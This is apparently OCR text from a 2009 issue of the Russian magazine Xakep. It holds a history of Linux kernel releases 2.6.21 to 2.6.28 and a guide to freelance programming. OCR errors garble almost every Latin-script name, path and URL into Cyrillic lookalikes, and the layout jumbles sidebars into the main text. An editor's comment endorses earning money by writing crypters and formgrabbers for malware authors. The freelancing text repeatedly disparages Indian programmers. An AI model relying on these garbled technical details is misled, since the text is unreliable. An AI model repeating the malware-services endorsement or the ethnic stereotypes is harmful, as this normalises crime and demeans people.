лизованную для процессоров семейства і386. Для версии 2.6.21 поверх 
этой системы добавляется реализация протокола ѴѴМІ (Ѵігіиаі МасЫпе 
Іпіегіасе), разработанного компанией ѴМѴѴаге и предназначенного для 
«общения» гостевых ОС с гипервизором. Ыпихтеперьспособен работать 
поверх ѴМѴѴаге в режиме паравиртуализации без каких-либо дополни- 
тельных патчей. В ядре 2.6.23 появляется поддержка работы поверхХеп 
и режим [диезі: (Ыпих внутри Ыпих). 

В 2.6.20 интегрирована новая система виртуализации КѴМ (Кегпеі- 
Ьазеб Ѵігіиаі МасЫпе). Она представляетсобой драйвер для поддержки 
технологий 5ѴМ/АМ0-Ѵ и ІпІеІѴТ. Традиционные виртуальные машины, 
работающие в пространстве пользователя, могут использовать этот 
драйвер для исполнения кода гостевых 00 на реальном процессоре. 
Сами разработчики предлагаютскачать слегка модифицированную 
версию дети для использования в связке со своей разработкой. 

В 2.6.21 функционал КѴМ расширяется и отныне включает поддержку 
паравиртуализации и функции заморозки/разморозки гостевых окружений. 
Релиз 2.6.23 принес КѴМ поддержку эмуляции многопроцессорных систем. 



В руках разработчиков появляется новая система РаиК іщесбоп, гене- 
нерирующая разнообразные фиктивные ошибки в подсистемах ядра. 
Новинку можно использовать, чтобы тестировать поведение кода в 
непредсказуемых ситуациях. 

501 разрабатываети даритмантейнерам Ыпих новый 51аЬ айосвіог 
5ШВ, оптимизированный для 5МР-систем с очень большим количест- 
вом узлов. 51аЬ аиосаЬг — очень важный компонент ядра, занимающий- 
ся выделением, кешированием и освобождением памяти для разнооб- 
разных объектов ядра. Его новая реализация становится стандартной в 
2.6.23. 

Дальше — больше. В ядро принимаютпатчи с реализацией нового 
беспроводного стека, разработанного компанией Веѵісезсаре, специа- 
лизирующейся на ѴѴіРі-технологиях. Более гибкий, удобный вуправле- 
нии, поддерживающий софтверную реализацию МАО, ѴѴЕР, ѴѴРА, 0о5, 
802.1 1д и мосты канального уровня, он без лишних обсуждений заменяет 
прежнюю реализацию. 

Замене подвергается и ЕігеѴѴіге-стек. Свежеиспеченный вариант стано- 
вится намного проще, удобнее в использовании, но сохраняет обратную 
совместимость. 
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В ядро интегрируется инновационный планировщикзадач с полно- 
стью справедливым распределением ресурсов СР5 (Сотріеіеіу Раіг 
ЗсЬесІиІег). Вместо очередей процессов, ожидающих выполнения, в нем 
используется дерево гЫгее, определяющее план с временем перехода 
к выполнению очередного процесса. Единица планирования времени 
в СРВ фиксирована (наносекунда) и не привязана кчастоте генерации 
прерыванийтаймера [ИІ]. 



ного устройства и высчитывается на основе скорости записи. Новов- 
ведение существенно повысит производительность в системах с очень 
медленными или очень быстрыми устройствами хранения. 

Появляется поддержка Еагде Ресеіѵе ОІІЬаб (ПРО). Серия ТСР-пакетов 
объединяется в один, за счет чего производительность также растет. 

Н 2.6.25 — 17 АПРЕЛЯ 






Н 2.6.24 — 25 ЯНВАРЯ 

Объявляется механизм Сопігоі бгоирз и привязанная кнему файловая 
система сдгоирз. В совокупности они позволяютуправлять процессами, 
памятью и другими ресурсами какобособленными объектами, не следу- 
ющими общей семантике поведения операционной системы. Это первая 
ласточка нового механизма управления изолированными окружениями, 
и вокруг нее будет построена целая система виртуализации. 

Также приняты патчи, уменьшающие фрагментацию при распределении 
страниц памяти (работы в этой области велисьтри года), и поддержка 
системы Тазк Сопігоі Огоирз, которая позволяет группировать процессы 
— этот подход используется планировщиком СР5 и механизмом Сризеіз 
(привязка группы процессов к конкретному процессорному ядру). 
Разработчики продолжают пилить планировщик С Р5. Он ста- 
новится на 10% производительней и обзаводится специальным 
режимом РаігОгоирЭсЬебиипд, который позволяет оперировать 
группами задач вместо отдельных процессов. Открывается воз- 
можность лимитировать использование процессора для конкрет- 
ного юзера или группы приложений (например, тиШтесІіа, не!). 
Какэтим пользоваться, описано в ОоситепІаІіоп/зсЬесІ-сІезідп- 
ОРЭ.ІхР 

Появляется режим работы Тіскіезз для архитектур х86-64, РРО, АРМ, 
МІР5 и ОМР (Озег Мобе Ріпих). Теперь ядро может отключить тай мер 
прерываний, что благоприятно сказывается на производительности и 
энергозатратах. 

Подсистема ММС существенно переработана и теперь поддерживает 
механизм 5010 (Эесиге ОідРаІ 1/0) и шину 5РІ. Благодаря этим новов- 
ведениям, девайсы, поддерживающие 5010 (КПК, смартфоны), могут 
использовать небольшиеустройства, выполненные в форм-факторе 50 
(модемы, 6 Р5-прием ники, ТВ-тюнеры ит.п.). 

Ведется подготовка к реализации ѴѴігеІезз 05В, в рамках которой 
добавляется поддержка ОЭВ-авторизации. Она позволяет выбирать, 
какие 05В-устройства могут использоваться, а какие — нет. Управлять 
доступом можно из юзерспейс, записывая «0»для запрета в/зуз/Ьиз/ 
изЬ/беѵісез/У0ТР0Й0ТВ0/аи1;ЬогІ2еб. 

Порогсбрасывания грязных буферов стал отдельным для каждого блоч- 



Новый механизм Метогу Везоигсе Ооп^гоРег позволяет использовать 
независимые методики управления памятью для заданных групп про- 
цессов (Тазк Оопігоі Огоирз). Применять это можно для изолирования 
отдельных приложений в небольшую область памяти, размер которой 
они не смогут превысить. Патчи написаны разработчиками 0репѴ2 и 
задействованы в их решениях виртуализации. 

В планировщикзадач добавляют возможность планировки групп 
задач в реальном режиме. Теперь все процессы, требующие работы в 
реальном времени, могут быть помещены в отдельную группу или просто 
запущены от имени специального пользователя. 

За каждым процессом в виртуальной файловой системе ргостеперь 
закреплен специальный файл радетарз, который в бинарном 
формате содержит позиции всех страниц памяти, используемых 
процессом. 

В ядро включена новая система мандатного контроля доступа 5МАСК, 
выполненная в виде Р5М-модуля. 5МАСК реализован через закрепле- 
ние меток к процессам и сущностям (файлы, пакеты, сокеты ит.д.), — в 
реализации и конфигурировании он проще, чем ЗЕРіпих. 

Приняты патчи, реализующие поддержку утилиты РаІепсуТОР ( ѵѵѵѵѵѵ. 
[аіепсѵіор.огд ) на уровне ядра. Благодаря РаІепсуТОР, разработчик 
может выявить в своей программе все узкие места и устранить их. 

Ядро обзаводится более высоким уровнем защиты для приложений 
— за что скажем «спасибо» интеграции некоторых патчей, разра- 
ботанных в рамках проекта ЕхесБЫеШ ( реорІе.гебЬаРсот/ппіпдо/ 
ехес-зЫеІб ) ! Адресное пространство после системного вызова Ьгк() 
теперь рандомизируется, что существенно усложняет некоторые 
типы атак. 

Компания Ѵоікзѵѵадеп дарит код с реализацией стека протоколов САМ 
(Сопігоиегагеа пеіѵѵогк) — они используются во встраиваемой технике и 
предназначены для связывания в сеть различныхустройств и датчиков. 
Разработчики допиливают подсистему АСРІ, в которой появился АРІ для 
автоматического управления температурой (устройство программиру- 
ется так, чтобы включить кулер или понизить частоту при достижении 
заданной температуры). 

ЕхЫ продолжает стремительное развитие и обзаводится такими нов- 
шествами, как: 
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ЕхіД показываетявное преимуществотолько в одном из синтетическихтестов І02опе 
— ^ 



1. Возможность задать размер блока вплотьдо размера страницы вирту- 
альной памяти, что для многих платформ означает 64 Кб. 

2. Увеличенные максимальные размеры файлов и всей ФС. 

3. Контрольные суммы журнала, которые не позволяют файловой систе- 
ме навредить себе, если журнал неуспел полностью записаться на диск 
или был поврежден. 

4. Версионирование іпосіе для надежной работы МР5 четвертой версии. 

5. ФС стала «Ехіепі-Ьазесі» (это означает существенный выигрыш в 
скорости при работе с большими файлами). 

6. Блоки распределяются целыми группами. На производительности это 
сказывается, опять же, положительно. 

В списке поддерживаемых архитектур теперьзначится ММЮЗОО/АМЗЗ, 
применяемая в серверах МА5 и одноплатных платформах Огіоп. 

г 2.6.26 — 14 июля 

Части файловых систем, монтируемых с помощью команды «тоипі; 
--ЬіпсІ», с 14 июля можно сделать незаписываемыми. Такая особенность 
используется для создания изолированных окружений, владелец кото- 
рых имеет гооі-доступ, но не может изменить определенные каталоги. 
Модуль КѴМ, предназначенный для создания виртуализированных 
окружений, отныне поддерживаетархитектуры ІА64, РРС и 5390 — и 
обладает поддержкой паравиртуализации. 

Новый стек беспроводных протоколов, интегрированный еще в 2.6.22, 



Новая технология под названием «Рег-ргосезз зесигеЬТз» позволяет 
привязать повышение привилегий с помощью зеШісІ-бита только для 
конкретного процесса, игнорируя всехего потомков (в обычной ситуации 
они тоже бы получили повышенные права). 

Контейнеры сдгоирз (Сопігоі Огоирз) могутбыть ограничены в воз- 
можностях обращения к оборудованию через списки разрешенных 
устройств. 

В ядре появляется собственный тестер памяти на ошибки, созданный 
по образу и подобию программы тетіезі ( ѵѵѵѵѵѵ.ппеппІезЕогд ). но более 
простой и нетакой эффективный. Для тестирования памяти достаточно 
указать параметр теппіезі: при загрузке. 

Параметры порога сбрасывания грязных буферов на диск теперь 
можно настроить через /зуз/сІазз/ЬсІі, а информация о точках 
монтирования доступна отдельно для каждого процесса в файле 
/ргос/$РІО/тоип1:іпЬ. 

Для устройств РСІ Ехргезз добавлена поддержка технологии А5РМ 
(Асбѵе Зіаіе Роѵѵег Мападетепі:). С ней можно более эффективноуправ- 
лять потреблением энергии через частичное обесточиваниеустройства 
во время бездействия. Наконец, ЛинусТорвальдс нисходите небес к 
обычному люду и позволяет включить в ядро отладчик КО О В, требующий 
отдельную машину для трассировки происходящих событий. Этого собы- 
тия многиеждали с момента выхода первой версии ядра! 



Кегпеі.огд — обитель новых Еіпих-ядер 

ТНе ипих КегпеІ Агскіѵев 
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Н 2.6.27 — 9 ОКТЯБРЯ 

Еіпих обзаводится поддержкой файловой системы НВІЕ5, 
разработанной компанией Мокіа и предназначенной для 
работы на ЛазЬ-накопителях с ограниченным числом за пи- 
си данных. НВІЕ5 не требует эмуляции блочного устройства 
со стороны накопителя и превосходит ^ЕЕ52 по скорости 
монтирования, наличиюжурналатранзакций, поддержке 
отложенной записи и прозрачной компрессии данных. 
Кроме ПВІЕ5, ядро получает реализацию файловой систе- 
мы ОМ Е5 (ЗопісЫие Орбтігеб МРЕ6 Еііе Бузует зиррогі;), 
созданной специально для хранения МРЕО-файлов и 
используемой в некоторых мультимедиа-плеерах. 
Появляется поддержка МиШдиеие пеіѵѵогкіпд, позволя- 
ющая создать несколько независимых очередей пакетов 
для одного устройства. Предполагается, что механизм 
будет работать в связке стехнологией ѴѴігеІезз МиШтебіа 
Ехіепзіоп, поддерживаемой некоторыми беспроводны- 
ми картами для параллельной передачи видео, голоса и 
данных. 

Системные вызовы, оперирующие файловыми дескрип- 
торами, получаютспециальный флаг«с1озе-оп-ехес». 
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ІСреднестатистический СЬапдеЬд ядра Ыпих весом 5.7 Мб 

■ ; . 

Файловый дескриптор будет закрыт во время вызова Фгк(). Это сведет 
на нет атаки, основанные на использовании дескрипторов, открытых 
родительским процессом. 

Ядро получаетновый механизм засыпания, основанный на системных 
вызовах кбитр и кехес. Первый позволяет сделать«мгновенный сни- 
мок» состояния ядра, а второй — загрузить новое ядро в память и пере- 
дать на него управление без перезагрузки. Перед выключением питания 
кбитрсбрасываетснимокна диск, а после включения кехес восстанав- 
ливаетего. Этотподход отнюдь не призван заменить традиционный, но 
может быть полезен в системах без поддержки АСРІ. 

Подсистема блочныхустройствтеперьумеет использоватьтакие 
нововведения 5С5І- и 5 АТА- протоколов, как«5ВС Па1:а Іпіедгбу Ріеіб» и 
«Ехіегпаі Рабп Ргоіесбоп» для добавления контрольных сумм кзаписы- 
ваемым данным. 

Разработчики получают в распоряжение механизм ттіоФасе, создан- 
ный для трассировки операций ввода/вывода, отраженных в память. Его 
можно использовать, например, для исследования и реверс инжини- 
ринга бинарных драйверов. 

Бинарные блоки бгтѵѵаге отныне не являются частью ядра или модулей. 
Вместо этого они копируются в каталогДіЬЛігтѵѵаге во время испол- 
нения команды «таке тобиІе5_іп5І:аи» и загружаются драйверами по 
мере необходимости. 

В Ех1;4 теперь есть механизм отложенного распределения информации. 
После системного вызова ѵѵгбеО файловая система откладываетзапись 
на диск нетолько самих данных, но и необходимых для иххранения 
структур (в основном, различные изменения в суперблоке). Это позволя- 
ет повысить производительность файловых операций и снизить фраг- 
ментацию данных. Похожим образом ведут себя 2Е5, ХЕ5, Вігі'з и ВеізегД. 
В ядро принимаются патчи дргса [ тхЬаагб.Фее.Ф/боѵѵпІоаб.ЬітІ ) с 
реализацией драйверов для более чем 230 ПЭВ-вебкамер. В списке 
поддерживаемых аппаратных платформ появляется строчка: одночипо- 
вые ПК Магѵеи Еокі. 

г 2.6.28 — 25 ДЕКАБРЯ 

ЕхЫ перестает быть экспериментальной разработкой. Фаза всесторон- 
него тестирования завершена, и новая файловая система получает ста- 
тус стабильной и рекомендованной для использования всем желающим. 
Добавлена новая подсистема ОЕМ (ОгарЫсз Ехесибоп Мападег), пред- 
назначенная для низкоуровнего доступа кпамяти видеоадаптера. ОЕМ 
разработан компанией Іпіеі и по задумке должен статьуниверсальной 
точкой доступа к видеопамяти для всех драйверов. Ата кже — принести 
такие вкусности, какпереключение видеорежима науровнеядра (то 
есть, никаких скачков во время переключения из «иксов» в консоль и об- 
ратно!) и совместный доступ нескольких приложений к видеокарте. Пока 
ОЕМ работаеттолько с драйвером і915, ноуже показываетувеличение 
производительности ЗП-приложений примерно на 50%. 

СтекѴѴігеІезз ОЭВтеперь работает благодаря интеграции в ядро под- 
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ГйгіЫ Ьі' Ппк ПЙІІ 1 иаІІс 

Сеанс работы судаленным отладчиком КСПВ 



держки технологии передачи данных ОѴѴВ (ІЛі:га ѴѴібе Вапб), использую- 
щей широкий спектр радио-частот(3.1-10.6 ГГц) и предназначенной для 
применения в домашнихусловиях (дальностьдо 10 метров). Крометого, 
ядротеперь включаетнесколько драйверов для ОѴѴВ-радиоконтролле- 
ров, следующих спецификации ѴѴігеІезз П5В 1 .0. 

Алгоритм замещения страниц оптимизирован для систем с очень 
большим объемом ОЗУ. Поиск кандидатов на место в своп-области про- 
изводится не по всем страницам памяти (может отнять слишком много 
времени), а по специальному списку, учитывающему только страницы 
загруженных в память файлов и анонимные страницы (например, выде- 
ленные с помощью таНосО). 

Контейнеры сдгоиртеперь могутбыть «заморожены», — это можно 
использовать для решений виртуализации. 

Появляется возможность экстренной парковки головок дисков. Некото- 
рые ноутбуки снабжены специальной технологией, работающей в паре с 
акселерометром. Она способна определить момент падения ноутбука и 
предупредить операционную систему о приближающемся конце. Еіпих 
теперь в силах спасти жесткий дискот повреждений! 

В пеФКе г появляется возможность прозрачного проксирования через 
указание целиТРВОХУ в ірІаЫез. Механизм МиШдиеие пеіѵѵогкіпд стал спо- 
собен помещать пакеты в очередь в соответствии с заданным приоритетом. 

г ИТОГИ 

Сжатая картина развития ядра Еіпих, обрисованная на четырех полосах, 
конечно, не может дать полного представления о гигантских изменениях, про- 
исходящих в ядерной кухне, но выводы позволяет сделать вполне конкретные: 

1. Принципы разработки ядра Еіпихдаже не собираются сдвигаться в 
сторону правильного дизайна или конкретного пути развития. Измене- 
ния столь разрозненны, что, наверное, сам ЛинусТорвальдс не понима- 
ет, к чему все это в итоге приведет. 

2. Сегодняшний Еіпихестьне что иное, какогромный пирог, выпекаемый 
массой компаний-поваров, каждая из которыхжаждет получить желае- 
мый лакомый кусочек, приложив для этого минимум усилий. Как резуль- 
тат, один край пирога оказывается сладким, а другой — солоноватым. 

3. Общая картина изменений говорите постепенном уходе ядра в мир 
смартфонов и планшетов, а также о развитии идей виртуализации (что, 
впрочем, вполне закономерно). 

4. Разработчики выдумывают множество самых разнообразныхтех- 
нологий отладки и трассировки, — это свидетельствуете все большем 
усложнении ядра. 

5. Даже основная ветка ядра не перестает быть площадкой для много- 
численных экспериментов. ^ 



ХАКЕР 03 /123/ 09 



► 087 




Взгляни-ка, товарищ, на статьи про фрилансеров на разнообразных дешевых 
сайтах. Они так мило начинаются со вступления о том, что слово «фрилан- 
сер» означает «свободный копьеносец», А еще рассказывают, что у фрилансе- 
ра нет перспектив роста, нет развития и часто — нет хороших денег. Статьи, 
как и фрилансеры, бывают хорошие и плохие. □□ наставит тебя на путь ис- 
тинный и расскажет, как воевать с индусами, злыми заказчиками и прочими 
трудностями на пути к финансовому благополучию. 



риланс принято противопоставлять офису. Свободный 
графики работа за уютным домашним компом или шаблон- 
ные рабочие дни с перерывом на обед! Во-первых, почему 
«или», если можно «и»? Во-вторых, превращение родного 
дома в рабочий кабинет не преимущество, а недостаток. В-третьих, все 
намного сложнее, чем кажется. Поэтому расставим мысли по полочкам и 
нарисуем птички над «й» — кто чего хочет добиться, сколько бабла за это 
получит и чем же все закончится. 

В ПОРТРЕТ ТИПОВОГО ФРИЛАНСЕРА 

Вот пять пунктов, которые способствуют превращениютебя во фрилан- 
сера: 

1. Утебя скучная работа, на которой часто приходится тупо сидеть и 
читать хакер. ГЦ . 

2. Ты — образцовый студент тех но вуза и после получения диплома 



будешь гордо зваться «инженер-программист». 

3. Живешьты чертзнает где, и поблизости неттолковых контор, где твой 
мозгоценили бы адекватно его содержимому. 

4 . Твой организм отключается на восходе солнца и включается, когда в 
аське все друг другу говорят: «я спать, утром на работу». Ты профессио- 
нальная сова-одиночка. 

5 . Утебя есть миллион других веских причин не ходить на одну постоян- 
ную работу. 

Последний пункт — всеобъемлющий и к нему лучше подходить философ- 
ски. Тянет все бросить? Сначала соберись с силами, займись фрилансом 
без отрыва отосновной работы. Ауже когда раскрутишься, топай к шефу 
нелюбимой конторы и высказывай все, что думаешьо нем и его заве- 
дении, если страсть, конечно, еще пылает. Неделей наоборот — скорее 
всего, ты слишком высокого мнения о себе, и утебя ничего не получится 
на вольном поприще. 




► 088 



ХАКЕР 03 /1 23 / 09 





соЛпд 



Почему? А вот, пожалуйста, пять ответов: 

1 . Какправило, первые месяцы фриланса приносятскудный доход. 

2. Тебе нужен хороший (очень хороший!) английский. Как письменный, 
таки устный. 

3. Тебе придется делать и то, что нравится/хочется, и то, что надо/не 
умеешь. 

4. Успех работы фрилансером сильно зависит оттого, умеешь ли ты 
отключать аську, говорить «нет, ребята, пиво не сегодня, ибо работаю» и 
вообще, толково распоряжаться своим временем. 

5. Тебе постоянно придется доказывать свои знания и умения, кропот- 
ливо собирать портфолио и отзывы о своих работах, вечно выяснять 
правду с заказчиками и бороться с индусами. 

Проблема втом, что в нашем мире проживает довольно много умных и 
амбициозных перцев. Аеще больше — просто наглых, которыеумеют 
объяснить заказчику, что они умные, талантливые и сделают работу бук- 
вально за копейки. Атебе придется сними бороться. Бороться придется 
вообщеза все — за заказы, за получениезаконнозаработанного бабла, 
за увеличение длительности проекта, за детальные спецификации. 

Н МАТЧАСТЬ 

Ну что, перестал витать в облаках и видетьжизнь свободного кодера 
строго в розовом свете?Тогда прекращаем нравоучения и принимаемся 
за работу. 

Четыре фрилансерские истины: 

1. Хорошее (по нашим меркам) бабло платят ТАМ; у нас платятменьше и 
требуют больше. 

2. Толковый фрилансер способен обольстить заказчика, доказать ему, 
что он самый умный, честный и исполнительный. 

3. Для «портфолио и опыта» работают лузеры, правильные перцы умеют 
зарабатывать и портфолио, и опыт, и бабло. 

4. УМНЫЙ фрилансерумеетчитать мысли заказчика и постоянно вытяги- 
вать из него деньги за новые супернеобходимые фишки кего проекту. 
Давай вспомним, чем ты слушал препода на парах по М5 Рго)есТ Ухом? 
Вот если ухом, то все в порядке, потому что тебе представится туча спо- 
собов закопаться по гланды в планировании, все напутать, ни разу не 
выспаться и сдать проекте отметкой «полнейшее фиаско». А ведьлюбой 
негативный отзыв отебе на фрилансерском сайте и все... нето чтобы 
совсем все, но потенциальному заказчику придется долго объяснять, 
почему втотразты не справился, а в этот — справишься. Придется 
учиться объяснять, почему этозадание надо отдатьтебе итолькотебе, 
чем ты лучше всех. Ито — только втом случае, если заказчик не настро- 
итфильтры против «согрешивших» кодеров. 

Фрилансерские истины, на самом деле, становятся актуальны только по 
прошествии некоторого количества времени. Вначалеты просто регис- 
трируешься на специальных сайтах, тщательно и аккуратно заполняешь 
профиль, добавляешь портфолио, проходишь встроенныетесты, чтобы 
доказать свой уровень знаний, и начинаешь охоту за работой. 
Программировать и созидать — удел программиста-штатника, а фри- 
лансеру приходится самому добывать себе проекты-заказы, самому 
распределять свое время (дня и ночи), определять фазы создания и 
отчитываться в успехах. Первое время дико раздражает и отвлекает 
много лишней и непрофильной работы. 

Работа продается, как с аукциона, где чаще всего побеждаеттот, кто 
согласится работатьза минимальное вознаграждение. Толковые 
заказчики еще и уровень реальныхзнаний проверяют, но иногда 
везет и совсем бездарным личностям. Случается это, когда в компании 
штатному маркетологу вверяют должность проджект-менеджера для 
создания веб-сайта или каких-то сервисов, а человек« не шарит». 

Вот и получает работу тот, кто сбил цену до минимума. Только качество 
итогового результата стоит под большущим знаком вопроса. Хотя, — это 
уже заказчику расхлебывать. 

В ИСКУССТВО ЗАРАБАТЫВАТЬ 

Со временем ты научишься быстро работать, отлаживать код и освоишь 
тонкости обольщения забугорных людей с деньгами. В каждом конкрет- 



ном случае — свои нюансы. Внимательно читайтребования заказчика 
и думай, на какие детали «поднажать». Старайся разобраться в его 
познаниях и желаниях. Еслитоварищеам незнает, чего хочет, лучше 
отправить его к индусам. Иначе есть шанс, что проектсвернется в самом 
разгаре, или ты будешь 666 раз все переделывать, а в итоге получишь 
какие-то копейки. Цени свое время, теперьоно оценивается долларами 
в час! Но ругаться с тем, кто предлагает тебе деньги — глупо. Быть умнее 
и хитрее — вотзалог получения хороших гонораров. 



Комментарий 

Саша Лозовский, главврач районной психиатрической 
больницы №71, редактор ^ 

Ни для кого не секрет, что большинство коллег из ^ — стопро- 
центные, закоренелые фрилансеры. Были в нашей компанейской 
жизни такие моменты, когда на фрилансе работала вообще вся ре- 
дакция — включая главного и выпускающего редактора (главным 
тогда был СпТТег) . Нуда, не об этом речь. На самом-то деле я хотел 
вьщелить пару нераскрытых в этой статье источников фрилансер- 
ского дохода: 

— Национальные проекты. Хитрые перцы, пристроившиеся 
кодить и верстать электронные книжки в рамках нац. проекта 
«инновационные компьютерные технологии в образовании», 
поимели в свое время совершенно некислое бабло. В частности, 
мой школьный друг заколотил за несколько недель тухлого НТМЬ- 
кодинга и расставления ссылок в е-книжечках около 250000 руб. 
Сам понимаешь, нац. проект, на таких вещах не экономят. Как с 
подобным будет в условиях кризиса — трудно сказать, скорее все- 
го, дело это навернется, но все равно — держи нос по ветру, будь 
на хорошем счету в своем высшем учебном учреждении, особенно 
если ты — постдипломник и имеешь репутацию, отличную от 
«умный, но горький пропойца и разгильдяй». 

— Тру-] [-КОДИНГ. Тут Горл может рассказать больше меня, но сам 
подумай: ведь не только за хакерский софт, чреватый проходом 
по статье, у нас платят бабло? За околохакерские проги его тоже 
отслюнявливают. Поэтому представители сферы обслужива- 
ния зло-кодеров со своими парсерами, пакерами-анпакерами, 
криптерами и формграбберами имеют свое бабло на кусок хлеба 
с сыром. 
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Сколько стоит 
средний индус? 

Если ты прилежно ходил на пары по экономике или когда-нибудь 
жил на одну зарплату, тебе известна непоколебимая истина: 
экономия — основа всего. Именно поэтому забугорные компании 
для разработки программных продуктов пользуются китайцами, 
индусами, белорусами, чехами ну и нами, жителями славной 
Державы. Фишка индусов и китайцев в том, что их много и стоят 
они крайне дешево, однако какие-то важные проекты им поручать 
опасно — код может получиться очень кривым. Зато цена удельно- 
го индуса, работающего в индийской же программерской конторе, 
колеблется от 4-5 до 15-20 долларов в час. Средний белорус из 
средней белорусской программерской конторы стоит уже 20-30 
баксов в час. А вот в «нормальных странах Европы и Америки» 
гений штатного рядового программиста может стоить и 30, и 40, 
и 50 долларов в час, в зависимости от обстоятельств. США — 40-50 
баксочасов. Имеются в виду цены разработки проектов, с учетом 
труда тестировщиков, маркетологов, дизайнеров и даже аренды 
помещения. То есть, это общая стоимость часа разработки. 

Тебе же стоит рассчитывать на 1-3 у.е. /час, если ты еще совсем 
учишься, и 10-15 у.е. /час, — если ты уже что-то умеешь. Хорошо 
пристроившись, можно и на 17-20 баксов в час договориться, 
но это редкость. На таких условиях фрилансерам отдают только 
какие-то сложные проекты, где нужны строго определенные и 
относительно редкие знания. 

Надежность заказчика приходится определять по косвенным призна- 
кам. Иногда стоиттребовать аванс до начала работы над проектом или 
после определения какой-то его стадии. Это обычная практика при 
фиксированной ценеза проект. Если заказчикпредлагаетпочасовую 
оплату, то финансы приезжают в конце каждой рабочей недели. 

Помни, что нетолько ты можешьуйти в запой и сорвать все сроки, но и 
заказчик может пропасть, кактолько получит готовый проект. Разница 
втом, что тебе грозит отметка в профиле (прощай, высокая карма!), а 
заказчику та кое наказание можетбыть и долампочки. 

На рынке свободного программерского труда наиболее востребованы 
специалисты широкого профиля по созданию веб-сайтов (чаще всего, 
РНР+А^АX) или, наоборот, оченьузкого — спецы по работам с базами 
данных. Есть много проектов для любителей ^аѵа, обычно это что-то 
для ѴѴеЬ. Виндовых приложений мало — только какие-то несложные 
утилиты или сервисы; все серьезное отдается на откуп программерским 
конторам. 

Вообще, компании нанимают кодера на сторонетогда, когда нужно 
дешево выполнить единичное задание, которое по каким-то причинам 
не могут сделать штатные кодеры; или же штатных кодеров нетсовсем, 
потому что у компании нет для них постоянной работы. Готовься работать 
с разными людьми, вплоть до таких, которым придется толковать, чем 
ЕІазЬ отличается от НТМЕ. Они просто набивают в Ооодіе что-то вроде 
І^гееіапсе ргодгатппегз, тыкают на сайт из первой пятерки результатов и 
абстрактно формируют задание. Отнесись внимательнее ктаким деяте- 
лям, — обезьяна с гранатой и то действует более логично и предсказуе- 
мо! Если точная формулировка задания звучит, как«а вот вы сделайте, 
мы посмотрим, и скажем, что поправить», стоит выяснить, будет ли 
заказчик платить вам за часы работы или строго за конечный результат. 

В случае фиксированного гонорара лучше положить на них болтсразу. 
Ну, или отправить к индусам. Когда заказчик не знает, что он хочет, он, 
скорее всего, и нормально платить не готов. 

Чтобы толковых заказов попадалось больше, имеетсмысл продвигать 
себя на «не самых популярных в мире сайтах». Нотутуже индивиду- 
альный выбор — постоянно просматриватьокеан работ, за большую 



часть которых не стоитбраться, или иметь дело с достаточно небольшим 
количеством заказов с меньшей конкуренцией и вменяемыми работо- 
дателями. Мне больше по душе последнее. Дело втом, что новыезаказы 
приходится постоянно мониторить — к первым подавшим заявку обычно 
благоволят больше. Ну и когда потокновыхзаказов меньше, еголегче 
контролировать. 

Н САМООРГАНИЗАЦИЯ 

Свободный графикработы и мелькающие на горизонте финансы стиму- 
лируюттвое желание кодить только первые месяцы. Чем дальше — тем 
хуже. Важно уметь заметить, что ты теряешь время, неэффективно его 
используешь — слишком много спишь, слишком много «разминаешься 
перед работой», слишком малодействительно работаешь. Следи за 
своим распорядком сам, раз над тобой никого нет. Иначе не будет нор- 
мального заработка и свободного времени, аты надолго зависнешь в 
промежуточном состоянии между программингом и ничегонеделанием. 
Если пойдешь по альтернативному пути и будешь сильно себя строить, 
то попадешь на следующий параграф — смотри ниже. 

Шум офисов и толпы народа тебя всегда раздражали? Тебя не на- 
прягает пару дней и ночей торчать перед монитором? Допустим, так, 
но без разнообразныхлюдишеквокругтвой характер подпортится. 
Будучи оторванным от социума, ты отстанешь и в профессиональном, 
и в культурном плане. Зря улыбаешься, со временем четыре стены и 



Время и деньги 

Цену на хорошие проекты сбивают часто (а точнее, почти всегда) . 
Под большими заданиями, пахнущими серьезным финансирова- 
нием, вывешены десятки демпингующих заявок от лиц индуской 
национальности и стратегов, пожелавших добавить себе хороший 
проект в портфолио. Стремясь получать «вкусные» заказы, нужно 
хорошенько подумать, как и чем привлечь заказчика, чтобы он 
хотя бы связался именно с тобой. Кроме грамотно заполненного 
профиля, ссылок на хорошие работы и прочих очеввдных методов, 
надо пробовать что-то свое. Например, нагадить в комментах по 
делу, как-то вьщелиться. Важно, чтобы заказчик тебя заметил, 
и ему захотелось тебе ответить (пусть даже в негативном клю- 
че) . Иногда очень действенен метод «рассказать, почему заказ 
нереально сделать в заданные сроки и почему он стоит намного 
больше». Или можно попробовать оптимизировать портфолио для 
проекта, чтобы предстать перед заказчиком в наилучшем виде. 
Единого рецепта тут нет, но общий курс, надеюсь, ясен. 

Порой действительно стоит согласиться поработать за копейки, 
просто ради опыта/портфолио, но это компромисс, на который 
идут новички. Рядом с качественно выполненным серьезным 
проектом и позитивным отзывом заказчика будет висеть еще и 
цена, которую он заплатил. С чего бы новым заказчикам платить 
больше? Вот и подумай, как аккуратно объяснить жителю славной 
Америки, что вон тот сайт ты сделал за 2 у.е. в час, а ему будешь 
делать только за 10 у.е.? В самом начале «фрилансерской карье- 
ры» можно создать что-то для себя или друзей, поучаствовать в 
конкурсах (когда оплачивается только та работа, которую выберет 
заказчик) или же взяться за ореп-зоигсе проект. Под надзором су- 
первайзеров ты достаточно быстро наберешься опыта, да и ссылка 
на этот проект будет красоваться в профиле. 

Когда перед тобой работодатели всего мира (а не одного региона), 
диапазон работ и цен дико расширяется. Даже кодеры с самыми ба- 
зовыми знаниями могут рассчитывать на какую-то работу с ценой 
1-3 бакса в час. Если ничего не умеешь, придется начинать с такой 
цены и учиться, учиться, учиться. Постоянное мелькание перед 
глазами проектов с более высокой оплатой должно подтолкнуть 
тебя к скорейшему изучению новых технологий. 
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набор жадных буржуев в скайпе начинают доставать. Даже плавающие 
на горизонте зеленые банкноты нетак радуют. Смысл бабла, когда его 
тратить некогда? Дорогое курево, пафосное бухло и даже билетна ѴІР- 
место на концерте Оересбе Мобе не принесутсчастья. Такчто, нетеряй 
голову, не бросай жизнь. Всех в мире денег не заработаешь. Постоянно 
совершенствуй своизнанияинезабывайо профессиональном росте. 

И, кстати, о нем. Большое количество реальных проектов учатжизни 
лучше любойтеории, нотехнологии совершенствуются, прогресс 
куда-то идет, а тебе надо идти и даже бежать рядом. Вон, .МеЫ.О еще 
не выпустили, а заказчики уже глядят на тех, кто готов использовать 
нерелизнутыетехнологии А5Р.МЕТ МѴС! Ты понял меня правильно 

— читай нужные сайты, следи затрендами и занимайся самообучением, 
иначе безнадежно отстанешь и устареешь. Владение свежими техноло- 
гиями повыситтвои шансы на получение новых проектов. 

